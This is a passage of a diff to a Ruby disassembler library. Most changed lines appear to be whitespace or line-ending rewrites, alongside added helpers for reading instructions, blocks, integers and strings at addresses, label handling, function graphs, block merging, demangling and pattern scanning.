normalize(addr)) - end - end - - # disassemble addr as if the code flow came from from_addr - def disassemble_from(addr, from_addr) - from_addr = from_addr.address if from_addr.kind_of? DecodedInstruction - from_addr = normalize(from_addr) - if b = block_at(from_addr) - b.add_to_normal(addr) - end - @addrs_todo << [addr, from_addr] - disassemble - end - - # returns the label associated to an addr, or nil if none exist - def get_label_at(addr) - e, b = get_section_at(addr, false) - e.inv_export[e.ptr] if e - end - - # sets the label for the specified address - # returns nil if the address is not mapped - # memcheck is passed to get_section_at to validate that the address is mapped - def set_label_at(addr, name, memcheck=true) - addr = Expression[addr].reduce - e, b = get_section_at(addr, memcheck) - if not e - elsif not l = e.inv_export[e.ptr] - l = @program.new_label(name) - e.add_export l, e.ptr - @label_alias_cache = nil - @old_prog_binding[l] = @prog_binding[l] = b + e.ptr - elsif l != name - l = rename_label l, @program.new_label(name) - end - l - end - - # remove a label at address addr - def del_label_at(addr, name=get_label_at(addr)) - ed, b = get_section_at(addr) - if ed and ed.inv_export[ed.ptr] - ed.del_export name, ed.ptr - @label_alias_cache = nil - end - each_xref(addr) { |xr| - next if not xr.origin or not o = @decoded[xr.origin] or not o.kind_of? Renderable - o.each_expr { |e| - e.lexpr = addr if e.lexpr == name - e.rexpr = addr if e.rexpr == name - } - } - @old_prog_binding.delete name - @prog_binding.delete name - end - - # changes a label to another, updates referring instructions etc - # returns the new label - # the new label must be program-uniq (see @program.new_label) - def rename_label(old, new) - each_xref(normalize(old)) { |x| - next if not di = @decoded[x.origin] - @cpu.replace_instr_arg_immediate(di.instruction, old, new) - di.comment.to_a.each { |c| c.gsub!(old, new) } - } - e, l = get_section_at(old, false) - if e - e.add_export new, e.export.delete(old), true - end - raise "cant rename nonexisting label #{old}" if not @prog_binding[old] - @label_alias_cache = nil - @old_prog_binding[new] = @prog_binding[new] = @prog_binding.delete(old) - @addrs_todo.each { |at| - case at[0] - when old; at[0] = new - when Expression; at[0] = at[0].bind(old => new) - end - } - - if @inv_section_reloc[old] - @inv_section_reloc[old].each { |b, e_, o, r| - (0..16).each { |off| - if di = @decoded[Expression[b]+o-off] and di.bin_length > off - @cpu.replace_instr_arg_immediate(di.instruction, old, new) - end - } - r.target = r.target.bind(old => new) - } - @inv_section_reloc[new] = @inv_section_reloc.delete(old) - end - - if c_parser and @c_parser.toplevel.symbol[old] - @c_parser.toplevel.symbol[new] = @c_parser.toplevel.symbol.delete(old) - @c_parser.toplevel.symbol[new].name = new - end - - new - end - - # finds the start of a function from the address of an instruction - def find_function_start(addr) - addr = addr.address if addr.kind_of? DecodedInstruction - todo = [addr] - done = [] - while a = todo.pop - a = normalize(a) - di = @decoded[a] - next if done.include? a or not di.kind_of? DecodedInstruction - done << a - a = di.block.address - break a if @function[a] - l = [] - di.block.each_from_samefunc(self) { |f| l << f } - break a if l.empty? - todo.concat l - end - end - - # iterates over the blocks of a function, yields each func block address - # returns the graph of blocks (block address => [list of samefunc blocks]) - def each_function_block(addr, incl_subfuncs = false, find_func_start = true) - addr = @function.index(addr) if addr.kind_of? DecodedFunction - addr = addr.address if addr.kind_of? DecodedInstruction - addr = find_function_start(addr) if not @function[addr] and find_func_start - todo = [addr] - ret = {} - while a = todo.pop - next if not di = di_at(a) - a = di.block.address - next if ret[a] - ret[a] = [] - yield a if block_given? - di.block.each_to_samefunc(self) { |f| ret[a] << f ; todo << f } - di.block.each_to_otherfunc(self) { |f| ret[a] << f ; todo << f } if incl_subfuncs - end - ret - end - alias function_blocks each_function_block - - # returns a graph of function calls - # for each func passed as arg (default: all), update the 'ret' hash - # associating func => [list of direct subfuncs called] - def function_graph(funcs = @function.keys + @entrypoints.to_a, ret={}) - funcs = funcs.map { |f| normalize(f) }.uniq.find_all { |f| @decoded[f] } - funcs.each { |f| - next if ret[f] - ret[f] = [] - each_function_block(f) { |b| - @decoded[b].block.each_to_otherfunc(self) { |sf| - ret[f] |= [sf] - } - } - } - ret - end - - # return the graph of function => subfunction list - # recurses from an entrypoint - def function_graph_from(addr) - addr = normalize(addr) - addr = find_function_start(addr) || addr - ret = {} - osz = ret.length-1 - while ret.length != osz - osz = ret.length - function_graph(ret.values.flatten + [addr], ret) - end - ret - end - - # return the graph of function => subfunction list - # for which a (sub-sub)function includes addr - def function_graph_to(addr) - addr = normalize(addr) - addr = find_function_start(addr) || addr - full = function_graph - ret = {} - todo = [addr] - done = [] - while a = todo.pop - next if done.include? a - done << a - full.each { |f, sf| - next if not sf.include? a - ret[f] ||= [] - ret[f] |= [a] - todo << f - } - end - ret - end - - # returns info on sections, from @program if supported - # returns an array of [name, addr, length, info] - def section_info - if @program.respond_to? :section_info - @program.section_info - else - list = [] - @sections.each { |k, v| - list << [get_label_at(k), normalize(k), v.length, nil] - } - list - end - end - - # transform an address into a file offset - def addr_to_fileoff(addr) - addr = normalize(addr) - @program.addr_to_fileoff(addr) - end - - # transform a file offset into an address - def fileoff_to_addr(foff) - @program.fileoff_to_addr(foff) - end - - # remove the decodedinstruction from..to, replace them by the new Instructions in 'by' - # this updates the block list structure, old di will still be visible in @decoded, except from original block (those are deleted) - # if from..to spans multiple blocks - # to.block is splitted after to - # all path from from are replaced by a single link to after 'to', be careful ! + # access the default value for @@backtrace_maxblocks for newly created Disassemblers + def self.backtrace_maxblocks ; @@backtrace_maxblocks ; end + def self.backtrace_maxblocks=(b) ; @@backtrace_maxblocks = b ; end + + # returns the dasm section's edata containing addr + # its #ptr points to addr + # returns the 1st element of #get_section_at + def get_edata_at(addr) + if s = get_section_at(addr) + s[0] + end + end + + # returns the DecodedInstruction at addr if it exists + def di_at(addr) + di = @decoded[addr] || @decoded[normalize(addr)] if addr + di if di.kind_of? DecodedInstruction + end + + # returns the InstructionBlock containing the address at addr + def block_at(addr) + di = di_at(addr) + di.block if di + end + + # returns the DecodedFunction at addr if it exists + def function_at(addr) + f = @function[addr] || @function[normalize(addr)] if addr + f if f.kind_of? DecodedFunction + end + + # returns the DecodedInstruction covering addr + # returns one at starting nearest addr if multiple are available (overlapping instrs) + def di_including(addr) + return if not addr + addr = normalize(addr) + if off = (0...16).find { |o| @decoded[addr-o].kind_of? DecodedInstruction and @decoded[addr-o].bin_length > o } + @decoded[addr-off] + end + end + + # returns the InstructionBlock containing the byte at addr + # returns the one of di_including() on multiple matches (overlapping instrs) + def block_including(addr) + di = di_including(addr) + di.block if di + end + + # returns the DecodedFunction including this byte + # return the one of find_function_start() if multiple are possible (block shared by multiple funcs) + def function_including(addr) + return if not di = di_including(addr) + function_at(find_function_start(di.address)) + end + + # yields every InstructionBlock + # returns the list of IBlocks + def each_instructionblock + ret = [] + @decoded.each { |addr, di| + next if not di.kind_of? DecodedInstruction or not di.block_head? + ret << di.block + yield di.block if block_given? + } + ret + end + alias instructionblocks each_instructionblock + + # return a backtrace_binding reversed (akin to code emulation) (but not really) + def get_fwdemu_binding(di, pc=nil) + @cpu.get_fwdemu_binding(di, pc) + end + + # reads len raw bytes from the mmaped address space + def read_raw_data(addr, len) + if e = get_section_at(addr) + e[0].read(len) + end + end + + # read an int of arbitrary type (:u8, :i32, ...) + def decode_int(addr, type) + type = "u#{type*8}".to_sym if type.kind_of? Integer + if e = get_section_at(addr) + e[0].decode_imm(type, @cpu.endianness) + end + end + + # read a byte at address addr + def decode_byte(addr) + decode_int(addr, :u8) + end + + # read a dword at address addr + # the dword is cpu-sized (eg 32 or 64bits) + def decode_dword(addr) + decode_int(addr, @cpu.size/8) + end + + # read a zero-terminated string from addr + # if no terminal 0 is found, return nil + def decode_strz(addr, maxsz=4096) + if e = get_section_at(addr) + str = e[0].read(maxsz).to_s + return if not len = str.index(?\0) + str[0, len] + end + end + + # read a zero-terminated wide string from addr + # return nil if no terminal found + def decode_wstrz(addr, maxsz=4096) + if e = get_section_at(addr) + str = e[0].read(maxsz).to_s + return if not len = str.unpack('v*').index(0) + str[0, 2*len] + end + end + + # disassembles one instruction at address + # returns nil if no instruction can be decoded there + # does not update any internal state of the disassembler, nor reuse the @decoded cache + def disassemble_instruction(addr) + if e = get_section_at(addr) + @cpu.decode_instruction(e[0], normalize(addr)) + end + end + + # disassemble addr as if the code flow came from from_addr + def disassemble_from(addr, from_addr) + from_addr = from_addr.address if from_addr.kind_of? DecodedInstruction + from_addr = normalize(from_addr) + if b = block_at(from_addr) + b.add_to_normal(addr) + end + @addrs_todo << [addr, from_addr] + disassemble + end + + # returns the label associated to an addr, or nil if none exist + def get_label_at(addr) + e, b = get_section_at(addr, false) + e.inv_export[e.ptr] if e + end + + # sets the label for the specified address + # returns nil if the address is not mapped + # memcheck is passed to get_section_at to validate that the address is mapped + def set_label_at(addr, name, memcheck=true) + addr = Expression[addr].reduce + e, b = get_section_at(addr, memcheck) + if not e + elsif not l = e.inv_export[e.ptr] + l = @program.new_label(name) + e.add_export l, e.ptr + @label_alias_cache = nil + @old_prog_binding[l] = @prog_binding[l] = b + e.ptr + elsif l != name + l = rename_label l, @program.new_label(name) + end + l + end + + # remove a label at address addr + def del_label_at(addr, name=get_label_at(addr)) + ed, b = get_section_at(addr) + if ed and ed.inv_export[ed.ptr] + ed.del_export name, ed.ptr + @label_alias_cache = nil + end + each_xref(addr) { |xr| + next if not xr.origin or not o = @decoded[xr.origin] or not o.kind_of? Renderable + o.each_expr { |e| + e.lexpr = addr if e.lexpr == name + e.rexpr = addr if e.rexpr == name + } + } + @old_prog_binding.delete name + @prog_binding.delete name + end + + # changes a label to another, updates referring instructions etc + # returns the new label + # the new label must be program-uniq (see @program.new_label) + def rename_label(old, new) + each_xref(normalize(old)) { |x| + next if not di = @decoded[x.origin] + @cpu.replace_instr_arg_immediate(di.instruction, old, new) + di.comment.to_a.each { |c| c.gsub!(old, new) } + } + e, l = get_section_at(old, false) + if e + e.add_export new, e.export.delete(old), true + end + raise "cant rename nonexisting label #{old}" if not @prog_binding[old] + @label_alias_cache = nil + @old_prog_binding[new] = @prog_binding[new] = @prog_binding.delete(old) + @addrs_todo.each { |at| + case at[0] + when old; at[0] = new + when Expression; at[0] = at[0].bind(old => new) + end + } + + if @inv_section_reloc[old] + @inv_section_reloc[old].each { |b, e_, o, r| + (0..16).each { |off| + if di = @decoded[Expression[b]+o-off] and di.bin_length > off + @cpu.replace_instr_arg_immediate(di.instruction, old, new) + end + } + r.target = r.target.bind(old => new) + } + @inv_section_reloc[new] = @inv_section_reloc.delete(old) + end + + if c_parser and @c_parser.toplevel.symbol[old] + @c_parser.toplevel.symbol[new] = @c_parser.toplevel.symbol.delete(old) + @c_parser.toplevel.symbol[new].name = new + end + + new + end + + # finds the start of a function from the address of an instruction + def find_function_start(addr) + addr = addr.address if addr.kind_of? DecodedInstruction + todo = [addr] + done = [] + while a = todo.pop + a = normalize(a) + di = @decoded[a] + next if done.include? a or not di.kind_of? DecodedInstruction + done << a + a = di.block.address + break a if @function[a] + l = [] + di.block.each_from_samefunc(self) { |f| l << f } + break a if l.empty? + todo.concat l + end + end + + # iterates over the blocks of a function, yields each func block address + # returns the graph of blocks (block address => [list of samefunc blocks]) + def each_function_block(addr, incl_subfuncs = false, find_func_start = true) + addr = @function.index(addr) if addr.kind_of? DecodedFunction + addr = addr.address if addr.kind_of? DecodedInstruction + addr = find_function_start(addr) if not @function[addr] and find_func_start + todo = [addr] + ret = {} + while a = todo.pop + next if not di = di_at(a) + a = di.block.address + next if ret[a] + ret[a] = [] + yield a if block_given? + di.block.each_to_samefunc(self) { |f| ret[a] << f ; todo << f } + di.block.each_to_otherfunc(self) { |f| ret[a] << f ; todo << f } if incl_subfuncs + end + ret + end + alias function_blocks each_function_block + + # returns a graph of function calls + # for each func passed as arg (default: all), update the 'ret' hash + # associating func => [list of direct subfuncs called] + def function_graph(funcs = @function.keys + @entrypoints.to_a, ret={}) + funcs = funcs.map { |f| normalize(f) }.uniq.find_all { |f| @decoded[f] } + funcs.each { |f| + next if ret[f] + ret[f] = [] + each_function_block(f) { |b| + @decoded[b].block.each_to_otherfunc(self) { |sf| + ret[f] |= [sf] + } + } + } + ret + end + + # return the graph of function => subfunction list + # recurses from an entrypoint + def function_graph_from(addr) + addr = normalize(addr) + addr = find_function_start(addr) || addr + ret = {} + osz = ret.length-1 + while ret.length != osz + osz = ret.length + function_graph(ret.values.flatten + [addr], ret) + end + ret + end + + # return the graph of function => subfunction list + # for which a (sub-sub)function includes addr + def function_graph_to(addr) + addr = normalize(addr) + addr = find_function_start(addr) || addr + full = function_graph + ret = {} + todo = [addr] + done = [] + while a = todo.pop + next if done.include? a + done << a + full.each { |f, sf| + next if not sf.include? a + ret[f] ||= [] + ret[f] |= [a] + todo << f + } + end + ret + end + + # returns info on sections, from @program if supported + # returns an array of [name, addr, length, info] + def section_info + if @program.respond_to? :section_info + @program.section_info + else + list = [] + @sections.each { |k, v| + list << [get_label_at(k), normalize(k), v.length, nil] + } + list + end + end + + # transform an address into a file offset + def addr_to_fileoff(addr) + addr = normalize(addr) + @program.addr_to_fileoff(addr) + end + + # transform a file offset into an address + def fileoff_to_addr(foff) + @program.fileoff_to_addr(foff) + end + + # remove the decodedinstruction from..to, replace them by the new Instructions in 'by' + # this updates the block list structure, old di will still be visible in @decoded, except from original block (those are deleted) + # if from..to spans multiple blocks + # to.block is splitted after to + # all path from from are replaced by a single link to after 'to', be careful ! # (eg a->b->... & a->c ; from in a, to in c => a->b is lost) - # all instructions are stuffed in the first block - # paths are only walked using from/to_normal - # 'by' may be empty - # returns the block containing the new instrs (nil if empty) - def replace_instrs(from, to, by) - raise 'bad from' if not fdi = di_at(from) or not fdi.block.list.index(fdi) - raise 'bad to' if not tdi = di_at(to) or not tdi.block.list.index(tdi) - - # create DecodedInstruction from Instructions in 'by' if needed - split_block(fdi.block, fdi.address) - split_block(tdi.block, tdi.block.list[tdi.block.list.index(tdi)+1].address) if tdi != tdi.block.list.last - fb = fdi.block - tb = tdi.block - - # generate DecodedInstr from Instrs - # try to keep the bin_length of original block - wantlen = tdi.address + tdi.bin_length - fb.address - wantlen -= by.grep(DecodedInstruction).inject(0) { |len, di| len + di.bin_length } - ldi = by.last - ldi = DecodedInstruction.new(ldi) if ldi.kind_of? Instruction - wantlen = by.grep(Instruction).length if wantlen < 0 or (ldi and ldi.opcode.props[:setip]) - by.map! { |di| - if di.kind_of? Instruction - di = DecodedInstruction.new(di) - wantlen -= di.bin_length = wantlen / by.grep(Instruction).length - end - di - } + # all instructions are stuffed in the first block + # paths are only walked using from/to_normal + # 'by' may be empty + # returns the block containing the new instrs (nil if empty) + def replace_instrs(from, to, by) + raise 'bad from' if not fdi = di_at(from) or not fdi.block.list.index(fdi) + raise 'bad to' if not tdi = di_at(to) or not tdi.block.list.index(tdi) + + # create DecodedInstruction from Instructions in 'by' if needed + split_block(fdi.block, fdi.address) + split_block(tdi.block, tdi.block.list[tdi.block.list.index(tdi)+1].address) if tdi != tdi.block.list.last + fb = fdi.block + tb = tdi.block + + # generate DecodedInstr from Instrs + # try to keep the bin_length of original block + wantlen = tdi.address + tdi.bin_length - fb.address + wantlen -= by.grep(DecodedInstruction).inject(0) { |len, di| len + di.bin_length } + ldi = by.last + ldi = DecodedInstruction.new(ldi) if ldi.kind_of? Instruction + wantlen = by.grep(Instruction).length if wantlen < 0 or (ldi and ldi.opcode.props[:setip]) + by.map! { |di| + if di.kind_of? Instruction + di = DecodedInstruction.new(di) + wantlen -= di.bin_length = wantlen / by.grep(Instruction).length + end + di + } #puts " ** patch next_addr to #{Expression[tb.list.last.next_addr]}" if not by.empty? and by.last.opcode.props[:saveip] - by.last.next_addr = tb.list.last.next_addr if not by.empty? and by.last.opcode.props[:saveip] - fb.list.each { |di| @decoded.delete di.address } - fb.list.clear - tb.list.each { |di| @decoded.delete di.address } - tb.list.clear - by.each { |di| fb.add_di di } - by.each_with_index { |di, i| - if odi = di_at(di.address) - # collision, hopefully with another deobfuscation run ? - if by[i..-1].all? { |mydi| mydi.to_s == @decoded[mydi.address].to_s } - puts "replace_instrs: merge at #{di}" if $DEBUG - by[i..-1] = by[i..-1].map { |xdi| @decoded[xdi.address] } - by[i..-1].each { fb.list.pop } - split_block(odi.block, odi.address) - tb.to_normal = [di.address] - (odi.block.from_normal ||= []) << to - odi.block.from_normal.uniq! - break - else - #raise "replace_instrs: collision #{di} vs #{odi}" - puts "replace_instrs: collision #{di} vs #{odi}" if $VERBOSE - while @decoded[di.address].kind_of? DecodedInstruction # find free space.. raise ? - di.address += 1 # XXX use floats ? - di.bin_length -= 1 - end - end - end - @decoded[di.address] = di - } - @addrs_done.delete_if { |ad| normalize(ad[0]) == tb.address or ad[1] == tb.address } - @addrs_done.delete_if { |ad| normalize(ad[0]) == fb.address or ad[1] == fb.address } if by.empty? and tb.address != fb.address - - # update to_normal/from_normal - fb.to_normal = tb.to_normal - fb.to_normal.to_a.each { |newto| - # other paths may already point to newto, we must only update the relevant entry - if ndi = di_at(newto) and idx = ndi.block.from_normal.to_a.index(to) - if by.empty? - ndi.block.from_normal[idx,1] = fb.from_normal.to_a - else - ndi.block.from_normal[idx] = fb.list.last.address - end - end - } - - fb.to_subfuncret = tb.to_subfuncret - fb.to_subfuncret.to_a.each { |newto| - if ndi = di_at(newto) and idx = ndi.block.from_subfuncret.to_a.index(to) - if by.empty? - ndi.block.from_subfuncret[idx,1] = fb.from_subfuncret.to_a - else - ndi.block.from_subfuncret[idx] = fb.list.last.address - end - end - } - - if by.empty? - tb.to_subfuncret = nil if tb.to_subfuncret == [] - tolist = tb.to_subfuncret || tb.to_normal.to_a - if lfrom = get_label_at(fb.address) and tolist.length == 1 - lto = auto_label_at(tolist.first) - each_xref(fb.address, :x) { |x| - next if not di = @decoded[x.origin] - @cpu.replace_instr_arg_immediate(di.instruction, lfrom, lto) - di.comment.to_a.each { |c| c.gsub!(lfrom, lto) } - } - end - fb.from_normal.to_a.each { |newfrom| - if ndi = di_at(newfrom) and idx = ndi.block.to_normal.to_a.index(from) - ndi.block.to_normal[idx..idx] = tolist - end - } - fb.from_subfuncret.to_a.each { |newfrom| - if ndi = di_at(newfrom) and idx = ndi.block.to_subfuncret.to_a.index(from) - ndi.block.to_subfuncret[idx..idx] = tolist - end - } - else - # merge with adjacent blocks - merge_blocks(fb, fb.to_normal.first) if fb.to_normal.to_a.length == 1 and di_at(fb.to_normal.first) - merge_blocks(fb.from_normal.first, fb) if fb.from_normal.to_a.length == 1 and di_at(fb.from_normal.first) - end - - fb if not by.empty? - end - - # undefine a sequence of decodedinstructions from an address - # stops at first non-linear branch - # removes @decoded, @comments, @xrefs, @addrs_done - # does not update @prog_binding (does not undefine labels) - def undefine_from(addr) - return if not di_at(addr) - @comment.delete addr if @function.delete addr - split_block(addr) - addrs = [] - while di = di_at(addr) - di.block.list.each { |ddi| addrs << ddi.address } - break if di.block.to_subfuncret.to_a != [] or di.block.to_normal.to_a.length != 1 - addr = di.block.to_normal.first - break if ndi = di_at(addr) and ndi.block.from_normal.to_a.length != 1 - end - addrs.each { |a| @decoded.delete a } - @xrefs.delete_if { |a, x| - if not x.kind_of? Array - true if x and addrs.include? x.origin - else - x.delete_if { |xx| addrs.include? xx.origin } - true if x.empty? - end - } - @addrs_done.delete_if { |ad| !(addrs & [normalize(ad[0]), normalize(ad[1])]).empty? } - end - - # merge two instruction blocks if they form a simple chain and are adjacent - # returns true if merged - def merge_blocks(b1, b2, allow_nonadjacent = false) - if b1 and not b1.kind_of? InstructionBlock - return if not b1 = block_at(b1) - end + by.last.next_addr = tb.list.last.next_addr if not by.empty? and by.last.opcode.props[:saveip] + fb.list.each { |di| @decoded.delete di.address } + fb.list.clear + tb.list.each { |di| @decoded.delete di.address } + tb.list.clear + by.each { |di| fb.add_di di } + by.each_with_index { |di, i| + if odi = di_at(di.address) + # collision, hopefully with another deobfuscation run ? + if by[i..-1].all? { |mydi| mydi.to_s == @decoded[mydi.address].to_s } + puts "replace_instrs: merge at #{di}" if $DEBUG + by[i..-1] = by[i..-1].map { |xdi| @decoded[xdi.address] } + by[i..-1].each { fb.list.pop } + split_block(odi.block, odi.address) + tb.to_normal = [di.address] + (odi.block.from_normal ||= []) << to + odi.block.from_normal.uniq! + break + else + #raise "replace_instrs: collision #{di} vs #{odi}" + puts "replace_instrs: collision #{di} vs #{odi}" if $VERBOSE + while @decoded[di.address].kind_of? DecodedInstruction # find free space.. raise ? + di.address += 1 # XXX use floats ? + di.bin_length -= 1 + end + end + end + @decoded[di.address] = di + } + @addrs_done.delete_if { |ad| normalize(ad[0]) == tb.address or ad[1] == tb.address } + @addrs_done.delete_if { |ad| normalize(ad[0]) == fb.address or ad[1] == fb.address } if by.empty? and tb.address != fb.address + + # update to_normal/from_normal + fb.to_normal = tb.to_normal + fb.to_normal.to_a.each { |newto| + # other paths may already point to newto, we must only update the relevant entry + if ndi = di_at(newto) and idx = ndi.block.from_normal.to_a.index(to) + if by.empty? + ndi.block.from_normal[idx,1] = fb.from_normal.to_a + else + ndi.block.from_normal[idx] = fb.list.last.address + end + end + } + + fb.to_subfuncret = tb.to_subfuncret + fb.to_subfuncret.to_a.each { |newto| + if ndi = di_at(newto) and idx = ndi.block.from_subfuncret.to_a.index(to) + if by.empty? + ndi.block.from_subfuncret[idx,1] = fb.from_subfuncret.to_a + else + ndi.block.from_subfuncret[idx] = fb.list.last.address + end + end + } + + if by.empty? + tb.to_subfuncret = nil if tb.to_subfuncret == [] + tolist = tb.to_subfuncret || tb.to_normal.to_a + if lfrom = get_label_at(fb.address) and tolist.length == 1 + lto = auto_label_at(tolist.first) + each_xref(fb.address, :x) { |x| + next if not di = @decoded[x.origin] + @cpu.replace_instr_arg_immediate(di.instruction, lfrom, lto) + di.comment.to_a.each { |c| c.gsub!(lfrom, lto) } + } + end + fb.from_normal.to_a.each { |newfrom| + if ndi = di_at(newfrom) and idx = ndi.block.to_normal.to_a.index(from) + ndi.block.to_normal[idx..idx] = tolist + end + } + fb.from_subfuncret.to_a.each { |newfrom| + if ndi = di_at(newfrom) and idx = ndi.block.to_subfuncret.to_a.index(from) + ndi.block.to_subfuncret[idx..idx] = tolist + end + } + else + # merge with adjacent blocks + merge_blocks(fb, fb.to_normal.first) if fb.to_normal.to_a.length == 1 and di_at(fb.to_normal.first) + merge_blocks(fb.from_normal.first, fb) if fb.from_normal.to_a.length == 1 and di_at(fb.from_normal.first) + end + + fb if not by.empty? + end + + # undefine a sequence of decodedinstructions from an address + # stops at first non-linear branch + # removes @decoded, @comments, @xrefs, @addrs_done + # does not update @prog_binding (does not undefine labels) + def undefine_from(addr) + return if not di_at(addr) + @comment.delete addr if @function.delete addr + split_block(addr) + addrs = [] + while di = di_at(addr) + di.block.list.each { |ddi| addrs << ddi.address } + break if di.block.to_subfuncret.to_a != [] or di.block.to_normal.to_a.length != 1 + addr = di.block.to_normal.first + break if ndi = di_at(addr) and ndi.block.from_normal.to_a.length != 1 + end + addrs.each { |a| @decoded.delete a } + @xrefs.delete_if { |a, x| + if not x.kind_of? Array + true if x and addrs.include? x.origin + else + x.delete_if { |xx| addrs.include? xx.origin } + true if x.empty? + end + } + @addrs_done.delete_if { |ad| !(addrs & [normalize(ad[0]), normalize(ad[1])]).empty? } + end + + # merge two instruction blocks if they form a simple chain and are adjacent + # returns true if merged + def merge_blocks(b1, b2, allow_nonadjacent = false) + if b1 and not b1.kind_of? InstructionBlock + return if not b1 = block_at(b1) + end if b2 and not b2.kind_of? InstructionBlock return if not b2 = block_at(b2) - end - if b1 and b2 and (allow_nonadjacent or b1.list.last.next_addr == b2.address) and - b1.to_normal.to_a == [b2.address] and b2.from_normal.to_a.length == 1 and # that handles delay_slot - b1.to_subfuncret.to_a == [] and b2.from_subfuncret.to_a == [] and - b1.to_indirect.to_a == [] and b2.from_indirect.to_a == [] - b2.list.each { |di| b1.add_di di } - b1.to_normal = b2.to_normal - b2.list.clear - @addrs_done.delete_if { |ad| normalize(ad[0]) == b2.address } - true - end - end - - # computes the binding of a code sequence - # just a forwarder to CPU#code_binding - def code_binding(*a) - @cpu.code_binding(self, *a) - end - - # returns an array of instructions/label that, once parsed and assembled, should - # give something equivalent to the code accessible from the (list of) entrypoints given - # from the @decoded dasm graph - # assume all jump targets have a matching label in @prog_binding - # may add inconditionnal jumps in the listing to preserve the code flow - def flatten_graph(entry, include_subfunc=true) - ret = [] - entry = [entry] if not entry.kind_of? Array - todo = entry.map { |a| normalize(a) } - done = [] - inv_binding = @prog_binding.invert - while addr = todo.pop - next if done.include? addr or not di_at(addr) - done << addr - b = @decoded[addr].block - - ret << Label.new(inv_binding[addr]) if inv_binding[addr] - ret.concat b.list.map { |di| di.instruction } - - b.each_to_otherfunc(self) { |to| - to = normalize to - todo.unshift to if include_subfunc - } - b.each_to_samefunc(self) { |to| - to = normalize to - todo << to - } - - if not di = b.list[-1-@cpu.delay_slot] or not di.opcode.props[:stopexec] or di.opcode.props[:saveip] - to = b.list.last.next_addr - if todo.include? to - if done.include? to or not di_at(to) - if not to_l = inv_binding[to] - to_l = auto_label_at(to, 'loc') - if done.include? to and idx = ret.index(@decoded[to].block.list.first.instruction) - ret.insert(idx, Label.new(to_l)) - end - end - ret << @cpu.instr_uncond_jump_to(to_l) - else - todo << to # ensure it's next in the listing - end - end - end - end - - ret - end - - # returns a demangled C++ name - # from wgcc-2.2.2/undecorate.cpp - # TODO - def demangle_cppname(name) - ret = name - if name[0] == ?? - name = name[1..-1] - if name[0] == ?? - name = name[1..-1] - op = name[0, 1] - op = name[0, 2] if op == '_' - if op = { - '2' => "new", '3' => "delete", '4' => "=", '5' => ">>", '6' => "<<", '7' => "!", '8' => "==", '9' => "!=", - 'A' => "[]", 'C' => "->", 'D' => "*", 'E' => "++", 'F' => "--", 'G' => "-", 'H' => "+", 'I' => "&", - 'J' => "->*", 'K' => "/", 'L' => "%", 'M' => "<", 'N' => "<=", 'O' => ">", 'P' => ">=", 'Q' => ",", - 'R' => "()", 'S' => "~", 'T' => "^", 'U' => "|", 'V' => "&&", 'W' => "||", 'X' => "*=", 'Y' => "+=", - 'Z' => "-=", '_0' => "/=", '_1' => "%=", '_2' => ">>=", '_3' => "<<=", '_4' => "&=", '_5' => "|=", '_6' => "^=", - '_7' => "`vftable'", '_8' => "`vbtable'", '_9' => "`vcall'", '_A' => "`typeof'", '_B' => "`local static guard'", - '_C' => "`string'", '_D' => "`vbase destructor'", '_E' => "`vector deleting destructor'", '_F' => "`default constructor closure'", - '_G' => "`scalar deleting destructor'", '_H' => "`vector constructor iterator'", '_I' => "`vector destructor iterator'", - '_J' => "`vector vbase constructor iterator'", '_K' => "`virtual displacement map'", '_L' => "`eh vector constructor iterator'", - '_M' => "`eh vector destructor iterator'", '_N' => "`eh vector vbase constructor iterator'", '_O' => "`copy constructor closure'", - '_S' => "`local vftable'", '_T' => "`local vftable constructor closure'", '_U' => "new[]", '_V' => "delete[]", - '_X' => "`placement delete closure'", '_Y' => "`placement delete[] closure'"}[op] - ret = op[0] == ?` ? op[1..-2] : "op_#{op}" - end - end - end - # TODO - ret - end - - # scans all the sections raw for a given regexp - # return/yields all the addresses matching - # if yield returns nil/false, do not include the addr in the final result - # sections are scanned MB by MB, so this should work (slowly) on 4GB sections (eg debugger VM) - def pattern_scan(pat, chunksz=nil, margin=nil) - chunksz ||= 4*1024*1024 # scan 4MB at a time - margin ||= 65536 # add this much bytes at each chunk to find /pat/ over chunk boundaries - - pat = Regexp.new(Regexp.escape(pat)) if pat.kind_of? ::String - - found = [] - @sections.each { |sec_addr, e| - e.pattern_scan(pat, chunksz, margin) { |eo| - match_addr = sec_addr + eo - found << match_addr if not block_given? or yield(match_addr) - false - } - } - found - end - - # returns/yields [addr, string] found using pattern_scan /[\x20-\x7e]/ - def strings_scan(minlen=6) - ret = [] - nexto = 0 - pattern_scan(/[\x20-\x7e]{#{minlen},}/m, nil, 1024) { |o| - if o - nexto > 0 - next unless e = get_edata_at(o) - str = e.data[e.ptr, 1024][/[\x20-\x7e]{#{minlen},}/m] - ret << [o, str] if not block_given? or yield(o, str) - nexto = o + str.length - end - } - ret - end - - # exports the addr => symbol map (see load_map) - def save_map - @prog_binding.map { |l, o| - type = di_at(o) ? 'c' : 'd' # XXX - o = o.to_s(16).rjust(8, '0') if o.kind_of? ::Integer - "#{o} #{type} #{l}" - } - end - - # loads a map file (addr => symbol) - # off is an optionnal offset to add to every address found (for eg rebased binaries) - # understands: - # standard map files (eg linux-kernel.map: , e.g. 'c01001ba t setup_idt') - # ida map files (: ) - # arg is either the map itself or the filename of the map (if it contains no newline) - def load_map(str, off=0) - str = File.read(str) rescue nil if not str.index("\n") - sks = @sections.keys.sort - str.each_line { |l| - case l.strip - when /^([0-9A-F]+)\s+(\w+)\s+(\w+)/i # kernel.map style - set_label_at($1.to_i(16)+off, $3) - when /^([0-9A-F]+):([0-9A-F]+)\s+([a-z_]\w+)/i # IDA style - # we do not have section load order, let's just hope that the addresses are sorted (and sortable..) - # could check the 1st part of the file, with section sizes, but it is not very convenient - # the regexp is so that we skip the 1st part with section descriptions - # in the file, section 1 is the 1st section ; we have an additionnal section (exe header) which fixes the 0-index - set_label_at(sks[$1.to_i(16)] + $2.to_i(16) + off, $3) - end + end + if b1 and b2 and (allow_nonadjacent or b1.list.last.next_addr == b2.address) and + b1.to_normal.to_a == [b2.address] and b2.from_normal.to_a.length == 1 and # that handles delay_slot + b1.to_subfuncret.to_a == [] and b2.from_subfuncret.to_a == [] and + b1.to_indirect.to_a == [] and b2.from_indirect.to_a == [] + b2.list.each { |di| b1.add_di di } + b1.to_normal = b2.to_normal + b2.list.clear + @addrs_done.delete_if { |ad| normalize(ad[0]) == b2.address } + true + end + end + + # computes the binding of a code sequence + # just a forwarder to CPU#code_binding + def code_binding(*a) + @cpu.code_binding(self, *a) + end + + # returns an array of instructions/label that, once parsed and assembled, should + # give something equivalent to the code 